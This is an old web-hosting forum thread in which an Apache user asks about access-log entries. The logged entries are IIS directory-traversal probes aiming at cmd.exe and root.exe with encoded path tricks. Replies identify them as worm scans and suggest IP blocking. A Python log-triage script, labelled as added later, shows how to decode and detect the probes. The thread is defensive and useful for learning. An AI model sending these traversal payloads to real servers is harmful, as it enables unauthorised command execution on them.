What's going on here?


bingoldsby (Technical User), Jan 24, 2002
Every few minutes I'm getting something like what I've pasted below from my access.log. This has been happening for quite a few days and has now gotten to be about the only thing I see in the log. Please help me to understand what's going on, if it's something I can and should take action against, and why me? The last few days of this kind of activity have been almost solely from this IP.

Thanks, Brian

216.187.243.69 - - [27/Jan/2002:01:12:19 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 291
216.187.243.69 - - [27/Jan/2002:01:12:19 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 289
216.187.243.69 - - [27/Jan/2002:01:12:19 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
216.187.243.69 - - [27/Jan/2002:01:12:19 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
216.187.243.69 - - [27/Jan/2002:01:12:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
216.187.243.69 - - [27/Jan/2002:01:12:21 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
216.187.243.69 - - [27/Jan/2002:01:12:21 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
216.187.243.69 - - [27/Jan/2002:01:12:21 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 346
216.187.243.69 - - [27/Jan/2002:01:12:22 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
216.187.243.69 - - [27/Jan/2002:01:12:22 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
216.187.243.69 - - [27/Jan/2002:01:12:22 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
216.187.243.69 - - [27/Jan/2002:01:12:22 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
216.187.243.69 - - [27/Jan/2002:01:12:23 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
216.187.243.69 - - [27/Jan/2002:01:12:23 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
216.187.243.69 - - [27/Jan/2002:01:12:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
216.187.243.69 - - [27/Jan/2002:01:12:24 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
 
You're being scanned for attack... that is a hacker looking for a vulnerability
on your system. Block the IP address and probably the last part of the class C.
Suggest blocking something like this: 216.187.243.0. This means deny access to
your entire system from this IP class. If the guy is dynamic he will just hit you with another number in the IP class C if you just block .69.

have fun!

Maxit

 
Hi Maxit,

I was able to come up with a domain name associated with the IP number and sent a notification of this activity to the support address which was listed on the page.

This morning, I got back a response suggesting that it was possibly a Code Red or Nimda operating on one of their customers' computers. I was asked to send along a sample of my server log. I did - 6 pages of it.

Last night I set several IP addresses with restrictions past the "htdocs" directory. Your suggestion goes a bit further, does it? I don't want to upset things too much. For instance, our own static IP address starts with 216.187 - and I wouldn't want to cut us off by mistake.

Please explain your zero at the end a bit further. Also, this morning, I still see that IP address showing up in the log, just with a different server status code - "403" instead of 404. You mention "deny access to your entire system." What about that?

If it's an automated thing and not stopped, I suppose I'll see those accesses still showing up no matter what I do. I haven't noticed anything going wrong here at our site, but I'm holding my breath a bit.

Thanks again, Brian
 
Don't worry about them, they are requests trying to use the IIS directory traversal exploit, which does not affect Apache servers.

If you are getting upset about the requests in your logs, do an inverse grep for cmd.exe and root.exe and send the output back to the original file C:\DOS:>
C:\DOS:>RUN
RUN DOS RUN!!
 
Huh?

It seems that when I had Apache start sending them back a different 400's message, most of them caught on that I had caught on and stopped the probes. However, as I am new to web hosting, and, as the internet connection is full-time, and there are web, mail, DNS, FTP, and VNC servers directly connected to our organization's LAN... well, yes, I am worried. Probably the best thing to be, considering all the mischief going on.

As far as grep, etc, goes - you lost me.

Thanks, Brian
 
Grepping:

Do this in your apache logfile directory:

# write to a temporary file first: "> logfile" would truncate the log before grep had read it
grep -vi 'root\.exe' logfile | grep -vi 'cmd\.exe' > logfile.clean && mv logfile.clean logfile

replacing 'logfile' with the name of your logfile (usually access_log)

This will delete all the requests from your log. C:\DOS:>
C:\DOS:>RUN
RUN DOS RUN!!
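Putting the two replies above together, here is an added example (mine, not code posted by anyone in this thread) that decodes these request paths the way the vulnerable IIS versions did, separates the probe lines from normal traffic as the grep does but without rewriting the log in place, counts probes per source address and status code (so Brian's change from 404 to 403 would show up in the summary), and checks whether an address falls inside the 216.187.243.0/24 range Maxit suggested blocking. The sample log is constructed: four lines are copied from Brian's post, two are made-up benign requests, and the last is a hypothetical probe from another address that got a 200, which Apache would never return, included only so the "investigate" path has something to flag.

```python
"""Triage IIS traversal probes (Nimda / Code Red II style) in an Apache log.

Added example for this thread, not code posted in it.  SAMPLE_LOG is
constructed: four lines copied from Brian's post, two made-up benign hits,
and one hypothetical probe from another address that got a 200 (Apache
would never do that) so the "investigate" path in triage() is exercised.
"""
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

SAMPLE_LOG = """\
216.187.243.69 - - [27/Jan/2002:01:12:19 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 291
216.187.243.69 - - [27/Jan/2002:01:12:21 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
216.187.243.69 - - [27/Jan/2002:01:12:22 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
216.187.243.69 - - [27/Jan/2002:01:12:23 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
10.0.0.5 - - [27/Jan/2002:01:15:02 -0800] "GET /index.html HTTP/1.0" 200 1043
10.0.0.5 - - [27/Jan/2002:01:15:03 -0800] "GET /images/logo.gif HTTP/1.0" 200 2211
192.0.2.10 - - [27/Jan/2002:01:20:40 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1420
"""

# Common Log Format: host ident user [time] "method path protocol" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# What the worms ask for once a traversal has reached the system directory.
TARGETS = ("cmd.exe", "root.exe")


def parse_line(line):
    """Fields of one CLF line, or None if it does not parse."""
    m = CLF.match(line)
    if not m:
        return None
    ip, when, method, path, status, _size = m.groups()
    return {"ip": ip, "time": when, "method": method, "path": path,
            "status": int(status), "raw": line}


def decode_iis_style(path):
    """Decode a path the way the vulnerable IIS builds did: two %-decoding
    passes reproduce the double-decode bug (%255c -> %5c -> \\) and the
    lenient two-byte step reproduces the overlong-UTF-8 bug (%c0%af -> /)."""
    raw = unquote_to_bytes(unquote_to_bytes(path))
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(raw):
            # Low 5 bits of the lead byte, low 6 of the next: no overlong check.
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def classify(entry):
    """Reasons a parsed request looks like an IIS traversal probe ([] if not)."""
    decoded = decode_iis_style(entry["path"].split("?", 1)[0]).lower()
    reasons = [t for t in TARGETS if t in decoded]
    if "../" in decoded.replace("\\", "/"):
        reasons.append("traversal: " + decoded)
    return reasons


def triage(log_text):
    """Separate probes from normal traffic and count probes per source/status."""
    probes, clean, by_source, successes = [], [], Counter(), []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if not reasons:
            clean.append(line)
            continue
        entry["reasons"] = reasons
        probes.append(entry)
        by_source[(entry["ip"], entry["status"])] += 1
        # A 2xx for cmd.exe or root.exe means something actually answered.
        if 200 <= entry["status"] < 300:
            successes.append(entry)
    return {"probes": probes, "clean": clean,
            "by_source": by_source, "successes": successes}


def in_blocked_range(ip, cidr="216.187.243.0/24"):
    """True if ip is inside the /24 Maxit suggested (216.187.243.0 to .255).
    Run it against your own address before adding the deny rule."""
    return ipaddress.ip_address(ip) in ipaddress.ip_network(cidr, strict=False)


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for (ip, status), n in sorted(result["by_source"].items()):
        print("%-16s status %d  %d probe(s)" % (ip, status, n))
    for e in result["successes"]:
        print("INVESTIGATE:", e["raw"])
    print("normal lines kept:", len(result["clean"]))
    print("216.187.1.10 in blocked /24?", in_blocked_range("216.187.1.10"))
```

The "clean" list is what the grep one-liner keeps; writing it to a new file and then swapping it in avoids the truncation you get from redirecting back onto the file being read. Note that an address starting 216.187 is not automatically inside the 216.187.243.0/24 block: the zero at the end stands for all 256 addresses of the 216.187.243.x network and nothing else, which is exactly what in_blocked_range tests.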
 
In Apache Win32?

I think I understand now. Sorry for not mentioning the Win32 thing. The log entries are ok. I probably need them as they are to learn from.

Thanks, Brian
 
I suggest getting BlackICE firewall running on your machine. It's a great nimble little firewall that's been protecting my network for some time.

It catches SOOO many exploits it's unbelievable. For instance, did you know that playing Quake3 online opens you up to a hack... mmmm, you do know.

BlackICE is great, it catches hackers in the act, blocks their access and allows you to stealth your machine to their particular IP.

I've caught many HTTPS attacks, TCP packet overflows, dodgy connection strings etc.

Try it.

Regards
 